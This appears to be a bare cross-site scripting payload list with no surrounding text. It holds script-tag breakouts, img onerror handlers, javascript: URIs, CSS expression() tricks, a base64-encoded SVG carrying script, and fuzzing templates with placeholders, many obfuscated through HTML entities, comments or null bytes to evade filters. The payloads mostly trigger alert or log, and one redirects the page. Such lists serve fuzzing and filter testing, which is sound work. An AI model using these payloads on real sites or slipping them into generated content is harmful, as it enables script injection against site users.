"><script>alert(0)</script>
><script>alert(0)</script>
<img src=@ onorror=alert(0) />
alert(0)
&ltimg src=@ onorror=alert(0)/&gt
&#60;&#105;&#109;&#103;&#32;&#115;&#114;&#99;&#61;&#64;&#32;&#111;&#110;&#111;&#114;&#114;&#111;&#114;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#48;&#41;&#32;&#47;&#62;
&#x00003c&#x000069&#x00006d&#x000067&#x000020&#x000073&#x000072&#x000063&#x00003d&#x000040&#x000020&#x00006f&#x00006e&#x00006f&#x000072&#x000072&#x00006f&#x000072&#x00003d&#x000061&#x00006c&#x000065&#x000072&#x000074&#x000028&#x000030&#x000029&#x000020&#x00002f&#x00003e
&#000060&#0000105&#0000109&#0000103&#000032&#0000115&#0000114&#000099&#000061&#000064&#000032&#0000111&#0000110&#0000111&#0000114&#0000114&#0000111&#0000114&#000061&#000097&#0000108&#0000101&#0000114&#0000116&#000040&#000048&#000041&#000032&#000047&#000062
&#000097&#0000108&#0000101&#0000114&#0000116&#000040&#000048&#000041
&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000048;&#000041;
&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000030;&#x000029;
&#x000061&#x00006c&#x000065&#x000072&#x000074&#x000028&#x000030&#x000029
javascript:myFunction(¡®<%=untrustedData%>¡¯, 'test');
"`'><script>*chr*log(*num*)</script>
'"`><script>/* **chr*log(*num*)// */</script>
"'><img src=xxx:x onerror*chr*=log(*num*)>
<script src="data:*chr*,log(*num*)"></script>
"'`><script>log*chr*(*num*)</script>
"'`><*chr*img src=xxx:x onerror=log(*num*)>
'`"><*chr*script>log(*num*)</script>
<a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a>
`"'><img src=xxx:x onerror*chr*=log(*num*)>
'"`><script>/* **chr*log(*num*)// */</script>
<a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a>
<a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a>
`'"><script>window['log*chr*'](*num*)</script>
'"`><div id="fuzzelement*num*" style="*chr*color:#000000;"></div>
"`'><script>*chr*log(*num*)</script>
--><!-- --*chr*> <img src=xxx:x onerror=log(*num*)> -->
`"'><img src=xxx:x *chr*onerror=log(*num*)>
javascript:alert('XSS');
ja/*s*/va/*s*/scr/*s*/ipt:ale/*s*/rt('XSS');
java/*javascript*/script:alert('XSS');
javas\0cr\000ipt:al\0000ert('XSS');
javas\0000cr\00000ipt:al\0000ert('XSS');
expr/*XSS*/ession(alert('XSS'))
\65xpression(alert('XSS'))
jav	ascript:alert('XSS');
jav&#x09;ascript:alert('XSS');
jav&#x0A;ascript:alert('XSS');
jav&#x0D;ascript:alert('XSS');
&#14;  javascript:alert('XSS');
no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))
url("javascript:alert('XSS')")
data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==
javascript:document.location='http://www.google.com/'
javas<!-- -->cript:alert('XSS')
\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029
javascr/*XSS*/ipt:alert(Str/*XSS*/ing.fr/*XSS*/omCharCode(88,83,83))
javascript:alert(Str\000ing.fr\000omCharCode(88,83,83))
javascrip\000t:alert(String.fromCharCode(88,83,83))
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#39&#88&#83&#83&#39&#41&#59
&#0106&#097&#0118&#097&#0115&#099&#0114&#0105&#0112&#0116&#058&#097&#0108&#0101&#0114&#0116&#040&#039&#088&#083&#083&#039&#041&#059
&#00106&#0097&#00118&#0097&#00115&#0099&#00114&#00105&#00112&#00116&#0058&#0097&#00108&#00101&#00114&#00116&#0040&#0039&#0088&#0083&#0083&#0039&#0041&#0059
&#000106&#00097&#000118&#00097&#000115&#00099&#000114&#000105&#000112&#000116&#00058&#00097&#000108&#000101&#000114&#000116&#00040&#00039&#00088&#00083&#00083&#00039&#00041&#00059
&#0000106&#000097&#0000118&#000097&#0000115&#000099&#0000114&#0000105&#0000112&#0000116&#000058&#000097&#0000108&#0000101&#0000114&#0000116&#000040&#000039&#000088&#000083&#000083&#000039&#000041&#000059
&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;&#59;
&#0106;&#097;&#0118;&#097;&#0115;&#099;&#0114;&#0105;&#0112;&#0116;&#058;&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;&#059;
&#x006a;&#x0061;&#x0076;&#x0061;&#x0073;&#x0063;&#x0072;&#x0069;&#x0070;&#x0074;&#x003a;&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0058;&#x0053;&#x0053;&#x0027;&#x0029;&#x003b;
&#000106;&#00097;&#000118;&#00097;&#000115;&#00099;&#000114;&#000105;&#000112;&#000116;&#00058;&#00097;&#000108;&#000101;&#000114;&#000116;&#00040;&#00039;&#00088;&#00083;&#00083;&#00039;&#00041;&#00059;
&#0000106;&#000097;&#0000118;&#000097;&#0000115;&#000099;&#0000114;&#0000105;&#0000112;&#0000116;&#000058;&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000039;&#000088;&#000083;&#000083;&#000039;&#000041;&#000059;
\0000000078\000000073s:e&#x5c;&#x78;p&#47;&#42;&#106;&#110;&#118;&#42;&#47;\0072\0065ssion(window.x?0:(alert(/xss/),window.x=1));

